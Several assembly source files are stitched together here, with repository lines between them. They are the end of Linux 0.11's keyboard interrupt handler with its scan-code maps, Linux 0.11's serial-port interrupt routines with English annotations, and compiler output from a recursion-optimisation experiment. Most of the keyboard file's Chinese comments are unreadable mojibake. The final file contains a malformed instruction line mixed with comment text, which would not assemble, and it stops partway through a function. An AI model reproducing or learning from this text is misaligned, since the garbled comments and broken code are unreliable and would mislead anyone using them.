call _do_tty_interrupt // յݸƳɹ淶ģʽݲڹ淶ַС
addl $4,%esp // ջIJļĴжϷء
pop %es
pop %ds
popl %edx
popl %ecx
popl %ebx
popl %eax
iret
set_e0: movb $1,e0 // յɨǰ0xe0 ʱe0 ־λ0
jmp e0_e1
set_e1: movb $2,e0 // յɨǰ0xe1 ʱe1 ־λ1
jmp e0_e1
/*
* This routine fills the buffer with max 8 bytes, taken from
* %ebx:%eax. (%edx is high). The bytes are written in the
* order %al,%ah,%eal,%eah,%bl,%bh ... until %eax is zero.
*/
/*
* ӳebx:eax е8 ַ뻺С(edx
* дַ˳al,ah,eal,eah,bl,bh...ֱeax 0
*/
put_queue:
pushl %ecx // ecxedx ݡ
pushl %edx // ȡ̨tty ṹжָ롣
movl _table_list,%edx # read-queue for console
movl head(%edx),%ecx // ȡͷָ??ecx
1: movb %al,buf(%edx,%ecx) // al еַ뻺ͷָλô
incl %ecx // ͷָǰ1 ֽڡ
andl $size-1,%ecx // ԻСͷָ(ػʼ)
cmpl tail(%edx),%ecx # buffer full - discard everything
// ͷָ==βָ()
je 3f // δַȫ
shrdl $8,%ebx,%eax // ebx 8 λλ8 λeax Уebx 䡣
je 2f // ַû(0)ת
shrl $8,%ebx // ebx бλ8 λת1
jmp 1b
2: movl %ecx,head(%edx) // ѽַ˶Уͷָ롣
movl proc_list(%edx),%ecx // öеĵȴָ룿
testl %ecx,%ecx // ṹָǷΪ(еȴöеĽ)
je 3f // ޣת
movl $0,(%ecx) // УøýΪо״̬(Ѹý)
3: popl %edx // ļĴء
popl %ecx
ret
// δctrl alt ɨ룬ֱģʽ־Ӧλɨ֮ǰյ
// 0xe0 ɨ(e0 ־λ)˵µǼұߵctrl alt Ӧctrl alt
// ģʽ־mode еıλ
ctrl: movb $0x04,%al // 0x4 ģʽ־mode ctrl Ӧıλ(λ2)
jmp 1f
alt: movb $0x10,%al // 0x10 ģʽ־mode alt Ӧıλ(λ4)
1: cmpb $0,e0 // e0 ־λ(µұߵctrl alt )
je 2f // ת
addb %al,%al // ǣijӦҼı־λ(λ3 λ5)
2: orb %al,mode // ģʽ־mode жӦıλ
ret
// δ봦ctrl alt ɿɨ룬Ӧλģʽ־mode еıλڴʱҪ
// e0 ־ǷλжǷǼұߵctrl alt
unctrl: movb $0x04,%al // ģʽ־mode ctrl Ӧıλ(λ2)
jmp 1f
unalt: movb $0x10,%al // 0x10 ģʽ־mode alt Ӧıλ(λ4)
1: cmpb $0,e0 // e0 ־λ(ͷŵұߵctrl alt )
je 2f // ǣת
addb %al,%al // ǣóɸλӦҼı־λ(λ3 λ5)
2: notb %al // λģʽ־mode жӦıλ
andb %al,mode
ret
lshift:
orb $0x01,mode // shift £mode жӦı־λ(λ0)
ret
unlshift:
andb $0xfe,mode // shift ɿλmode жӦı־λ(λ0)
ret
rshift:
orb $0x02,mode // shift £mode жӦı־λ(λ1)
ret
unrshift:
andb $0xfd,mode // shift ɿλmode жӦı־λ(λ1)
ret
caps: testb $0x80,mode // ģʽ־mode λ7 ǷѾλ(״̬)
jne 1f // Ѵڰ״̬(ret)
xorb $4,leds // תleds ־caps-lock λ(λ2)
xorb $0x40,mode // תmode ־caps µıλ(λ6)
orb $0x80,mode // mode ־caps Ѱ±־λ(λ7)
// δleds ־رLED ָʾ
set_leds:
call kb_wait // ȴ̿뻺ա
movb $0xed,%al /* set leds command */ /* LED */
outb %al,$0x60 // ͼ0xed 0x60 ˿ڡ
call kb_wait // ȴ̿뻺ա
movb leds,%al // ȡleds ־Ϊ
outb %al,$0x60 // ò
ret
uncaps: andb $0x7f,mode // caps ɿλģʽ־mode еĶӦλ(λ7)
ret
scroll:
xorb $1,leds // scroll £תleds ־еĶӦλ(λ0)
jmp set_leds // leds ־¿رLED ָʾ
num: xorb $2,leds // num £תleds ־еĶӦλ(λ1)
jmp set_leds // leds ־¿رLED ָʾ
/*
* curosr-key/numeric keypad cursor keys are handled here.
* checking for numeric keypad etc.
*/
/*
* ﴦ/С̷С̵ȡ
*/
cursor:
subb $0x47,%al // ɨСּϵļ(ɨ>=0x47)ģ
jb 1f // Сء
cmpb $12,%al // ɨ > 0x53(0x53 - 0x47= 12)
ja 1f // ɨֵ83(0x53)ء
jne cur2 /* check for ctrl-alt-del */ /* Ƿctrl-alt-del */
// 12˵del ѱ£жctrl
// alt ǷҲͬʱ¡
testb $0x0c,mode // ctrl
je cur2 // ޣת
testb $0x30,mode // alt
jne reboot // Уת
cur2: cmpb $0x01,e0 /* e0 forces cursor movement */ /* e0 λʾƶ */
// e0 ־λ
je cur // λˣתƶcur
testb $0x02,leds /* not num-lock forces cursor */ /* num-lock */
// leds б־num-lock ־Ƿλ
je cur // ûλ(num LED )Ҳйƶ
testb $0x03,mode /* shift forces cursor */ /* shift Ҳʹƶ */
// ģʽ־mode shift ±־
jne cur // shift £Ҳйƶ
xorl %ebx,%ebx // ѯɨֱ(199 )ȡӦASCII 롣
movb num_table(%eax),%al // eax ΪֵȡӦַ??al
jmp put_queue // ַ뻺С
1: ret
// δ봦ƶ
cur: movb cur_table(%eax),%al // ȡַӦĴַ??al
cmpb $'9,%al // ַ<='9'˵һҳһҳɾ
ja ok_cur // ַҪַ'~'
movb $'~,%ah
ok_cur: shll $16,%eax // ax Ƶeax С
movw $0x5b1b,%ax // ax з'esc ['ַeax ַƶС
xorl %ebx,%ebx
jmp put_queue // ַ뻺С
#if defined(KBD_FR)
num_table:
.ascii "789 456 1230." // СϼӦASCII
#else
num_table:
.ascii "789 456 1230,"
#endif
cur_table:
.ascii "HA5 DGC YB623" // СϷɾӦƶʾַ
/*
* this routine handles function keys
*/
// ӳܼ
func:
pushl %eax
pushl %ecx
pushl %edx
call _show_stat // ʾ״̬(kernl/sched.c, 37)
popl %edx
popl %ecx
popl %eax
subb $0x3B,%al // ܼ'F1'ɨ0x3B˴ʱal ǹܼš
jb end_func // ɨС0x3bء
cmpb $9,%al // ܼF1-F10
jbe ok_func // ǣת
subb $18,%al // ǹܼF11F12
cmpb $10,%al // ǹܼF11
jb end_func // ǣء
cmpb $11,%al // ǹܼF12
ja end_func // ǣء
ok_func:
cmpl $4,%ecx /* check that there is enough room */ * Ƿ㹻ռ*/
jl end_func // Ҫ4 ַУŲ£ء
movl func_table(,%eax,4),%eax // ȡܼӦַС
xorl %ebx,%ebx
jmp put_queue // 뻺С
end_func:
ret
/*
* function keys send F1:'esc [ [ A' F2:'esc [ [ B' etc.
*/
/*
* ܼ͵ɨ룬F1 Ϊ'esc [ [ A' F2 Ϊ'esc [ [ B'ȡ
*/
func_table:
.long 0x415b5b1b,0x425b5b1b,0x435b5b1b,0x445b5b1b
.long 0x455b5b1b,0x465b5b1b,0x475b5b1b,0x485b5b1b
.long 0x495b5b1b,0x4a5b5b1b,0x4b5b5b1b,0x4c5b5b1b
// ɨ-ASCII ַӳ
// config.h жļ(FINNISHUSGERMENFRANCH)Ӧɨӳ
// ASCII ַ
#if defined(KBD_FINNISH)
// Ƿ̵ɨӳ
key_map:
.byte 0,27 // ɨ0x00,0x01 ӦASCII 룻
.ascii "1234567890+'" // ɨ0x02,...0x0c,0x0d ӦASCII 룬ơ
.byte 127,9
.ascii "qwertyuiop}"
.byte 0,13,0
.ascii "asdfghjkl|{"
.byte 0,0
.ascii "'zxcvbnm,.-"
.byte 0,'*,0,32 /* 36-39 */ /* ɨ0x36-0x39 ӦASCII */
.fill 16,1,0 /* 3A-49 */ /* ɨ0x3A-0x49 ӦASCII */
.byte '-,0,0,0,'+ /* 4A-4E */ /* ɨ0x4A-0x4E ӦASCII */
.byte 0,0,0,0,0,0,0 /* 4F-55 */ /* ɨ0x4F-0x55 ӦASCII */
.byte '<
.fill 10,1,0
// shift ͬʱʱӳ
shift_map:
.byte 0,27
.ascii "!\"#$%&/()=?`"
.byte 127,9
.ascii "QWERTYUIOP]^"
.byte 13,0
.ascii "ASDFGHJKL\\["
.byte 0,0
.ascii "*ZXCVBNM;:_"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
// alt ͬʱʱӳ
alt_map:
.byte 0,0
.ascii "\0@\0$\0\0{[]}\\\0"
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#elif defined(KBD_US)
// ʽ̵ɨӳ
key_map:
.byte 0,27
.ascii "1234567890-="
.byte 127,9
.ascii "qwertyuiop[]"
.byte 13,0
.ascii "asdfghjkl;'"
.byte '`,0
.ascii "\\zxcvbnm,./"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '<
.fill 10,1,0
shift_map:
.byte 0,27
.ascii "!@#$%^&*()_+"
.byte 127,9
.ascii "QWERTYUIOP{}"
.byte 13,0
.ascii "ASDFGHJKL:\""
.byte '~,0
.ascii "|ZXCVBNM<>?"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
alt_map:
.byte 0,0
.ascii "\0@\0$\0\0{[]}\\\0"
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#elif defined(KBD_GR)
// ǵ̵ɨӳ
key_map:
.byte 0,27
.ascii "1234567890\\'"
.byte 127,9
.ascii "qwertzuiop@+"
.byte 13,0
.ascii "asdfghjkl[]^"
.byte 0,'#
.ascii "yxcvbnm,.-"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '<
.fill 10,1,0
shift_map:
.byte 0,27
.ascii "!\"#$%&/()=?`"
.byte 127,9
.ascii "QWERTZUIOP\\*"
.byte 13,0
.ascii "ASDFGHJKL{}~"
.byte 0,''
.ascii "YXCVBNM;:_"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
alt_map:
.byte 0,0
.ascii "\0@\0$\0\0{[]}\\\0"
.byte 0,0
.byte '@,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#elif defined(KBD_FR)
// Ƿ̵ɨӳ
key_map:
.byte 0,27
.ascii "&{\"'(-}_/@)="
.byte 127,9
.ascii "azertyuiop^$"
.byte 13,0
.ascii "qsdfghjklm|"
.byte '`,0,42 /* coin sup gauche, don't know, [*|mu] */
.ascii "wxcvbn,;:!"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '<
.fill 10,1,0
shift_map:
.byte 0,27
.ascii "1234567890]+"
.byte 127,9
.ascii "AZERTYUIOP<>"
.byte 13,0
.ascii "QSDFGHJKLM%"
.byte '~,0,'#
.ascii "WXCVBN?./\\"
.byte 0,'*,0,32 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte '-,0,0,0,'+ /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '>
.fill 10,1,0
alt_map:
.byte 0,0
.ascii "\0~#{[|`\\^@]}"
.byte 0,0
.byte '@,0,0,0,0,0,0,0,0,0,0
.byte '~,13,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0
.byte 0,0,0,0,0,0,0,0,0,0,0
.byte 0,0,0,0 /* 36-39 */
.fill 16,1,0 /* 3A-49 */
.byte 0,0,0,0,0 /* 4A-4E */
.byte 0,0,0,0,0,0,0 /* 4F-55 */
.byte '|
.fill 10,1,0
#else
#error "KBD-type not defined"
#endif
/*
* do_self handles "normal" keys, ie keys that don't change meaning
* and which have just one character returns.
*/
/*
* do_self ڴͨҲûб仯ֻһַصļ
*/
do_self:
// 454-460 ڸģʽ־mode ѡalt_mapshift_map key_map ӳ֮һ
lea alt_map,%ebx // alt ͬʱʱӳַalt_map??ebx
testb $0x20,mode /* alt-gr */ /* alt ͬʱ? */
jne 1f // ǣǰת1
lea shift_map,%ebx // shift ͬʱʱӳַshift_map??ebx
testb $0x03,mode // shift ͬʱ
jne 1f // Уǰת1
lea key_map,%ebx // ʹͨӳkey_map
// ȡӳжӦɨASCII ַûжӦַ(תnone)
1: movb (%ebx,%eax),%al // ɨΪֵȡӦASCII ??al
orb %al,%al // ⿴ǷжӦASCII 롣
je none // û(ӦASCII =0)ء
// ctrl Ѱ»caps ַ'a'-'}'(0x61-0x7D)Χڣתɴдַ
// (0x41-0x5D)
testb $0x4c,mode /* ctrl or caps */ /* ƼѰ»caps */
je 2f // ûУǰת2
cmpb $'a,%al // al еַ'a'Ƚϡ
jb 2f // al ֵ<'a'ת2
cmpb $'},%al // al еַ'}'Ƚϡ
ja 2f // al ֵ>'}'ת2
subb $32,%al // al תΪдַ(0x20)
// ctrl Ѱ£ַ'`'--'_'(0x40-0x5F)֮(Ǵдַ)תΪַ
// (0x00-0x1F)
2: testb $0x0c,mode /* ctrl */ /* ctrl ͬʱ*/
je 3f // ûת3
cmpb $64,%al // al '@'(64)ַȽ(жַΧ)
jb 3f // ֵ<'@'ת3
cmpb $64+32,%al // al '`'(96)ַȽ(жַΧ)
jae 3f // ֵ>='`'ת3
subb $64,%al // al ֵ0x40
// ַתΪ0x00-0x1f ֮Ŀַ
// alt ͬʱ£ַλ7 λ
3: testb $0x10,mode /* left alt */ /* alt ͬʱ£*/
je 4f // ûУת4
orb $0x80,%al // ַλ7 λ
// al еַС
4: andl $0xff,%eax // eax ĸֺah
xorl %ebx,%ebx // ebx
call put_queue // ַ뻺С
none: ret
/*
* minus has a routine of it's own, as a 'E0h' before
* the scan code for minus means that the numeric keypad
* slash was pushed.
*/
/*
* ԼĴӳΪڼɨ֮ǰ0xe0
* ζŰСϵбܼ
*/
minus: cmpb $1,e0 // e0 ־λ
jne do_self // ûУdo_self Լŷͨ
movl $'/,%eax // '/'滻'-'??al
xorl %ebx,%ebx
jmp put_queue // ַ뻺С
/*
* This table decides which routine to call when a scan-code has been
* gotten. Most routines just call do_self, or none, depending if
* they are make or break.
*/
/* һӳַתȡɨݴ˱Ӧɨ봦ӳ
* õӳdo_selfnoneǰ(make)ͷż(break)
*/
key_table:
.long none,do_self,do_self,do_self /* 00-03 s0 esc 1 2 */
.long do_self,do_self,do_self,do_self /* 04-07 3 4 5 6 */
.long do_self,do_self,do_self,do_self /* 08-0B 7 8 9 0 */
.long do_self,do_self,do_self,do_self /* 0C-0F + ' bs tab */
.long do_self,do_self,do_self,do_self /* 10-13 q w e r */
.long do_self,do_self,do_self,do_self /* 14-17 t y u i */
.long do_self,do_self,do_self,do_self /* 18-1B o p } ^ */
.long do_self,ctrl,do_self,do_self /* 1C-1F enter ctrl a s */
.long do_self,do_self,do_self,do_self /* 20-23 d f g h */
.long do_self,do_self,do_self,do_self /* 24-27 j k l | */
.long do_self,do_self,lshift,do_self /* 28-2B { para lshift , */
.long do_self,do_self,do_self,do_self /* 2C-2F z x c v */
.long do_self,do_self,do_self,do_self /* 30-33 b n m , */
.long do_self,minus,rshift,do_self /* 34-37 . - rshift * */
.long alt,do_self,caps,func /* 38-3B alt sp caps f1 */
.long func,func,func,func /* 3C-3F f2 f3 f4 f5 */
.long func,func,func,func /* 40-43 f6 f7 f8 f9 */
.long func,num,scroll,cursor /* 44-47 f10 num scr home */
.long cursor,cursor,do_self,cursor /* 48-4B up pgup - left */
.long cursor,cursor,do_self,cursor /* 4C-4F n5 right + end */
.long cursor,cursor,cursor,cursor /* 50-53 dn pgdn ins del */
.long none,none,do_self,func /* 54-57 sysreq ? < f11 */
.long func,none,none,none /* 58-5B f12 ? ? ? */
.long none,none,none,none /* 5C-5F ? ? ? ? */
.long none,none,none,none /* 60-63 ? ? ? ? */
.long none,none,none,none /* 64-67 ? ? ? ? */
.long none,none,none,none /* 68-6B ? ? ? ? */
.long none,none,none,none /* 6C-6F ? ? ? ? */
.long none,none,none,none /* 70-73 ? ? ? ? */
.long none,none,none,none /* 74-77 ? ? ? ? */
.long none,none,none,none /* 78-7B ? ? ? ? */
.long none,none,none,none /* 7C-7F ? ? ? ? */
.long none,none,none,none /* 80-83 ? br br br */
.long none,none,none,none /* 84-87 br br br br */
.long none,none,none,none /* 88-8B br br br br */
.long none,none,none,none /* 8C-8F br br br br */
.long none,none,none,none /* 90-93 br br br br */
.long none,none,none,none /* 94-97 br br br br */
.long none,none,none,none /* 98-9B br br br br */
.long none,unctrl,none,none /* 9C-9F br unctrl br br */
.long none,none,none,none /* A0-A3 br br br br */
.long none,none,none,none /* A4-A7 br br br br */
.long none,none,unlshift,none /* A8-AB br br unlshift br */
.long none,none,none,none /* AC-AF br br br br */
.long none,none,none,none /* B0-B3 br br br br */
.long none,none,unrshift,none /* B4-B7 br br unrshift br */
.long unalt,none,uncaps,none /* B8-BB unalt br uncaps br */
.long none,none,none,none /* BC-BF br br br br */
.long none,none,none,none /* C0-C3 br br br br */
.long none,none,none,none /* C4-C7 br br br br */
.long none,none,none,none /* C8-CB br br br br */
.long none,none,none,none /* CC-CF br br br br */
.long none,none,none,none /* D0-D3 br br br br */
.long none,none,none,none /* D4-D7 br br br br */
.long none,none,none,none /* D8-DB br ? ? ? */
.long none,none,none,none /* DC-DF ? ? ? ? */
.long none,none,none,none /* E0-E3 e0 e1 ? ? */
.long none,none,none,none /* E4-E7 ? ? ? ? */
.long none,none,none,none /* E8-EB ? ? ? ? */
.long none,none,none,none /* EC-EF ? ? ? ? */
.long none,none,none,none /* F0-F3 ? ? ? ? */
.long none,none,none,none /* F4-F7 ? ? ? ? */
.long none,none,none,none /* F8-FB ? ? ? ? */
.long none,none,none,none /* FC-FF ? ? ? ? */
/*
* kb_wait waits for the keyboard controller buffer to empty.
* there is no timeout - if the buffer doesn't empty, we hang.
*/
/*
* ӳkb_wait ڵȴ̿աڳʱ -
* ԶյĻͻԶȴ()
*/
kb_wait:
pushl %eax
1: inb $0x64,%al // ̿״̬
testb $0x02,%al // 뻺ǷΪ(0)
jne 1b // գתѭȴ
popl %eax
ret
/*
* This routine reboots the machine by asking the keyboard
* controller to pulse the reset-line low.
*/
/*
* ӳͨü̿λ壬ʹϵͳλ(reboot)
*/
reboot:
call kb_wait // ȵȴ̿뻺ա
movw $0x1234,0x472 /* don't do memory check */
movb $0xfc,%al /* pulse reset and A20 low */
outb %al,$0x64 // ϵͳλA20 塣
die: jmp die //
|
Akagi201/linux-0.11
| 3,831
|
kernel/chr_drv/rs_io.s
|
/*
* linux/kernel/rs_io.s
*
* (C) 1991 Linus Torvalds
*/
/*
* rs_io.s
*
* This module implements the rs232 io interrupts.
*/
/*
* óģʵrs232 жϴ
*/
.text
.globl _rs1_interrupt,_rs2_interrupt
// size is the byte length of the read/write circular buffers.
size = 1024 /* must be power of two !
and must match the value
in tty_io.c!!! */
/* these are the offsets into the read/write buffer structures */
// They mirror the field offsets of struct tty_queue in include/linux/tty.h.
rs_addr = 0 // offset of the port field (0x3f8 for serial 1, 0x2f8 for serial 2)
head = 4 // offset of the buffer head index
tail = 8 // offset of the buffer tail index
proc_list = 12 // offset of the pointer to the process waiting on this queue
buf = 16 // offset of the data buffer itself
startup = 256 /* chars left in write queue when we restart it */
/* i.e. once 256 chars (WAKEUP_CHARS) are free again the writer is resumed */
/*
* These are the actual interrupt routines. They look where
* the interrupt is coming from, and take appropriate action.
*/
/*
 * (translated from garbled Chinese annotation) These are the actual
 * interrupt routines: they determine where the interrupt came from and
 * take the appropriate action.
 */
.align 2
// Entry point for the serial port 1 interrupt.
_rs1_interrupt:
pushl $_table_list+8 // push address of serial 1's read/write queue pointers (tty_io.c)
jmp rs_int
.align 2
// Entry point for the serial port 2 interrupt.
_rs2_interrupt:
pushl $_table_list+16 // push address of serial 2's read/write queue pointers
// Common body: save registers, then dispatch on the UART's interrupt
// identification register (IIR) until no interrupt is pending.
rs_int:
pushl %edx
pushl %ecx
pushl %ebx
pushl %eax
push %es
push %ds /* as this is an interrupt, we cannot */
pushl $0x10 /* know that ds is ok. Load it */
pop %ds /* (point ds at the kernel data segment, selector 0x10) */
pushl $0x10 /* and likewise for es */
pop %es
movl 24(%esp),%edx // edx = the queue-pointer table address pushed at entry
movl (%edx),%edx // edx = pointer to this port's read queue (struct tty_queue)
movl rs_addr(%edx),%edx // edx = UART base port (0x3f8 or 0x2f8)
addl $2,%edx /* interrupt ident. reg */ /* edx now addresses the IIR */
rep_int: // loop while the IIR reports pending interrupts
xorl %eax,%eax // clear eax so al fully determines the table index
inb %dx,%al // read the interrupt identification byte
testb $1,%al // bit 0 = 1 means no interrupt pending
jne end // nothing pending - leave
cmpb $6,%al /* this shouldn't happen, but ... */ /* valid ids are 0..6 */
ja end // bogus value - bail out
movl 24(%esp),%ecx // ecx = queue-pointer table address again, for the handler
pushl %edx // save the IIR port (base+2)
subl $2,%edx // edx = UART base port again
call jmp_table(,%eax,2) /* NOTE! not *4, bit0 is 0 already */
// al holds id<<1 with bit 0 clear, so scaling by 2 indexes the .long table.
popl %edx // restore the IIR port
jmp rep_int // check for further pending interrupts
end: movb $0x20,%al // send EOI to the interrupt controller
outb %al,$0x20 /* EOI */
pop %ds
pop %es
popl %eax
popl %ebx
popl %ecx
popl %edx
addl $4,%esp # jump over _table_list entry # drop the pushed table address
iret
// жʹַת4 жԴ
// modem ״̬仯жϣдַжϣַжϣ·״̬жϡ
// Dispatch table indexed by UART interrupt type:
// 0 = modem status change, 1 = transmit buffer empty,
// 2 = received data available, 3 = line status change.
jmp_table:
.long modem_status,write_char,read_char,line_status
.align 2
// Modem-status interrupt: reading the modem status register (base+6)
// is enough to acknowledge and clear it.
modem_status:
addl $6,%edx /* clear intr by reading modem status reg */
inb %dx,%al /* port 0x3fe (or 0x2fe) */
ret
.align 2
// Line-status interrupt: reading the line status register (base+5)
// is enough to acknowledge and clear it.
line_status:
addl $5,%edx /* clear intr by reading line status reg. */
inb %dx,%al /* port 0x3fd (or 0x2fd) */
ret
.align 2
// Receive-data interrupt: store the incoming byte in the tty read queue
// and invoke the C-level tty interrupt handler.
// NOTE(review): the original annotations on the first two instructions
// opened /* comments without ever closing them, which in GAS would swallow
// the following code; rewritten as // comments.
read_char:
inb %dx,%al // al = received character (read from UART base port)
movl %ecx,%edx // edx = address of this port's queue-pointer table entry
subl $_table_list,%edx // offset from the start of _table_list
shrl $3,%edx // /8: yields 1 for serial port 1, 2 for serial port 2
movl (%ecx),%ecx # read-queue # ecx = read queue (struct tty_queue)
movl head(%ecx),%ebx // ebx = buffer head index
movb %al,buf(%ecx,%ebx) // store the character at the head position
incl %ebx // advance the head
andl $size-1,%ebx // wrap around the power-of-two buffer
cmpl tail(%ecx),%ebx // would the head catch up with the tail?
je 1f // buffer full - do not commit the advance
movl %ebx,head(%ecx) // commit the new head index
1: pushl %edx // argument: tty/serial line number (1 or 2)
call _do_tty_interrupt // C-level tty interrupt handling
addl $4,%esp // pop the argument
ret
.align 2
// Transmit-buffer-empty interrupt: feed the UART the next character from
// the tty write queue, waking any sleeping writer once space frees up.
write_char:
movl 4(%ecx),%ecx # write-queue # ecx = write queue (struct tty_queue)
movl head(%ecx),%ebx // ebx = head index
subl tail(%ecx),%ebx // head - tail ...
andl $size-1,%ebx # nr chars in queue # ... modulo the buffer size
je write_buffer_empty // queue empty - nothing to send
cmpl $startup,%ebx // more than 256 chars still queued?
ja 1f // yes - no need to wake the writer yet
movl proc_list(%ecx),%ebx # wake up sleeping process # get waiting process
testl %ebx,%ebx # is there any? # NULL means nobody is waiting
je 1f // nobody to wake
movl $0,(%ebx) // set its state to 0 (runnable)
1: movl tail(%ecx),%ebx // ebx = tail index
movb buf(%ecx,%ebx),%al // fetch the next character to transmit
outb %al,%dx // write it to the transmit register (base port)
incl %ebx // advance the tail
andl $size-1,%ebx // wrap around the power-of-two buffer
movl %ebx,tail(%ecx) // commit the new tail index
cmpl head(%ecx),%ebx // queue fully drained now?
je write_buffer_empty // yes - go disable the transmit interrupt
ret
.align 2
// The write queue is empty: wake any waiting writer and mask the UART's
// transmit-holding-register-empty interrupt so it stops firing.
write_buffer_empty:
movl proc_list(%ecx),%ebx # wake up sleeping process # get waiting process
testl %ebx,%ebx # is there any? # NULL means nobody is waiting
je 1f # nobody to wake
movl $0,(%ebx) # set its state to 0 (runnable)
1: incl %edx # edx = interrupt-enable register (base+1)
inb %dx,%al # read the current interrupt-enable bits
jmp 1f # short jmp chain as an I/O recovery delay
1: jmp 1f
1: andb $0xd,%al /* disable transmit interrupt */
/* 0x0d keeps bits 0,2,3 and clears bit 1 (THR-empty interrupt enable) */
outb %al,%dx // write the mask back to base+1
ret
|
akalenuk/wordsandbuttons
| 1,475
|
exp/recursion_optimization/no_tco.s
|
.file "no_tco.cpp"
.section .text.unlikely,"ax",@progbits
.LCOLDB0:
.text
.LHOTB0:
.p2align 4,,15
.globl _Z12sum_of_firsti
.type _Z12sum_of_firsti, @function
# int sum_of_first(int n) — public entry (SysV AMD64, n in edi, result in
# eax).  Fast path: n == 0 returns 0; otherwise tail-jump to the
# out-of-line recursive worker split off by GCC's partial inlining.
_Z12sum_of_firsti:
.LFB0:
.cfi_startproc
testl %edi, %edi # n == 0 ?
jne .L4
xorl %eax, %eax # yes: the sum is 0
ret
.p2align 4,,10
.p2align 3
.L4:
jmp _Z12sum_of_firsti.part.0 # tail-call the n > 0 worker
.cfi_endproc
.LFE0:
.size _Z12sum_of_firsti, .-_Z12sum_of_firsti
.section .text.unlikely
.LCOLDE0:
.text
.LHOTE0:
.section .text.unlikely
.LCOLDB1:
.text
.LHOTB1:
.p2align 4,,15
.type _Z12sum_of_firsti.part.0, @function
# Worker for n > 0: computes n + sum_of_first(n - 1), except that when
# n == 1 the cmove forces the result to 1 (the recursion's base term).
# Genuinely recursive — the add after the call prevents tail-call
# optimization, hence the file name "no_tco".
_Z12sum_of_firsti.part.0:
.LFB2:
.cfi_startproc
pushq %rbx
.cfi_def_cfa_offset 16
.cfi_offset 3, -16
movl %edi, %ebx # preserve n across the recursive call
leal -1(%rdi), %edi # argument for the recursion: n - 1
call _Z12sum_of_firsti
movl $1, %edx # candidate result for the base case
addl %ebx, %eax # eax = n + sum_of_first(n - 1)
cmpl $1, %ebx
cmove %edx, %eax # n == 1 => result is 1
popq %rbx
.cfi_def_cfa_offset 8
ret
.cfi_endproc
.LFE2:
.size _Z12sum_of_firsti.part.0, .-_Z12sum_of_firsti.part.0
.section .text.unlikely
.LCOLDE1:
.text
.LHOTE1:
.section .text.unlikely
.LCOLDB2:
.section .text.startup,"ax",@progbits
.LHOTB2:
.p2align 4,,15
.globl main
.type main, @function
# main: GCC partially folded the top-level call — it invokes the worker
# with 65535 and adds the already-known top term 65536 afterwards.
main:
.LFB1:
.cfi_startproc
subq $8, %rsp # realign stack to 16 bytes for the call
.cfi_def_cfa_offset 16
movl $65535, %edi
call _Z12sum_of_firsti.part.0
addq $8, %rsp
.cfi_def_cfa_offset 8
addl $65536, %eax # fold in the constant top term
ret
.cfi_endproc
.LFE1:
.size main, .-main
.section .text.unlikely
.LCOLDE2:
.section .text.startup
.LHOTE2:
.ident "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609"
.section .note.GNU-stack,"",@progbits
|
akalenuk/wordsandbuttons
| 2,039
|
exp/recursion_optimization/no_tco_instances_trick_4.s
|
.file "no_tco_instances_trick_4.cpp"
.section .text.unlikely,"ax",@progbits
.LCOLDB0:
.text
.LHOTB0:
.p2align 4,,15
.type _Z12sum_of_firstILi0ELi4EEii.part.2, @function
# Template-unrolled recursive sum: each activation peels four recursion
# levels (terms n, n-1, n-2, n-3) before recursing with n - 4, cutting the
# call depth by a factor of four versus the plain recursion.  The .L2/.L3/
# .L4/.L5 blocks fold the peeled terms back in, innermost first; each uses
# the cmovne pattern so a level whose argument was 1 contributes the base
# value 1 instead of an accumulated sum.
_Z12sum_of_firstILi0ELi4EEii.part.2:
.LFB8:
.cfi_startproc
pushq %r13
.cfi_def_cfa_offset 16
.cfi_offset 13, -16
pushq %r12
.cfi_def_cfa_offset 24
.cfi_offset 12, -24
pushq %rbp
.cfi_def_cfa_offset 32
.cfi_offset 6, -32
pushq %rbp saved above; rbx below holds level-1 argument
pushq %rbx
.cfi_def_cfa_offset 40
.cfi_offset 3, -40
